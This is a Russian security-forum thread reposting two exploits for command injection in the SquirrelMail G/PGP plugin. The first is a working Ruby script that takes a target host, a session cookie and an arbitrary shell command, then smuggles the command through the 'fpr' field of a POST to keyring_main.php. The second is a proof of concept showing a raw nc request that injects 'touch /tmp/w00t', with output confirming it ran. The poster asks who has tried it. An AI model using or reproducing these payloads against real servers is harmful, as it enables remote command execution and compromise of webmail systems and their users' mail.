Форум АНТИЧАТ - [Обзор уязвимостей SquirrelMail]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - [Обзор уязвимостей SquirrelMail] (https://forum.antichat.xyz/showthread.php?t=340398)

SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit

Код:

Code:

===============================================================

SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit

===============================================================



#!/usr/local/bin/ruby



puts"http://backdoored.net\n"

puts "SquirrelMail G/PG deletekey() command injection exploit\n"

puts "Coded by Backdoored member.   \n" 

puts "--------------------------------------------------\n"



if ARGV[0] == nil && ARGV[1] == nil && ARGV[2] ==  nil && ARGV[3] == nil && ARGV[4] == nil && ARGV[5] == nil

puts "Usage: ./squ_xploit  hostname path port cookie command 0\n"

puts "if host using ssl use 1 instead of 0\n"

exit

end



require 'net/http'

require 'net/https'



host = ARGV[0].to_s

port = ARGV[2].to_i

cookie = ARGV[3].to_s

victim = Net::HTTP.new(host,port)

        if ARGV[3].to_i == 1

        puts "Entering SSL mode baby\n"

        victim.use_ssl = true

        end

command = ARGV[4].to_s

#path = '/sq/plugins/gpg/modules/keyring_main.php'

path = ARGV[1].to_s

data = "id=C5B1611B8E71C***&fpr= | " + command + "| &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1"

pizza = "key=pYWrEbVTY%2Bc%3D; SQMSESSID=" + cookie;

headers = {

  'Cookie' => pizza,

  'Referer' => 'http://www.google.com',

  'Content-Type' => 'application/x-www-form-urlencoded'

}

resp, data = victim.post(path,data,headers)

puts 'Message = ' + resp.message

puts  'Code = ' + resp.code



resp.each {|key,val| puts key + ' = ' + val}

#puts data

SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln

Код:

Code:

================================================================

SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln

================================================================



SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability



Bugtraq ID: 24782



-----------------------------



There are various vulnerabilities in this software! One is in

keyring_main.php!

$fpr is not escaped from shellcommands!



testbox:/home/w00t# cat /tmp/w00t

cat: /tmp/w00t: No such file or directory

testbox:/home/w00t#



***@silverlaptop:~$ nc *** 80

POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1

Host: ***

User-Agent: w00t

Keep-Alive: 300

Connection: keep-alive

Cookie: Authentication Data for SquirrelMail

Content-Type: application/x-www-form-urlencoded

Content-Length: 140



id=C5B1611B8E71C***&fpr= | touch /tmp/w00t |

&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1



...



testbox:/home/w00t# cat /tmp/w00t

testbox:/home/w00t#



So we just executed 'touch /tmp/w00t'!



WabiSabiLabi tries to sell the exploit for 700 Euro! ;)

lol @ WabiSabiLabi!



Greets:



oli and all members of jmp-esp!



jmp-esp is looking for people who are interested in IT security!

Currently we are looking for people who like to write articles for a

German ezine or are interested in exchanging informations, exploits...



IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl)

    #main

кто пробовал?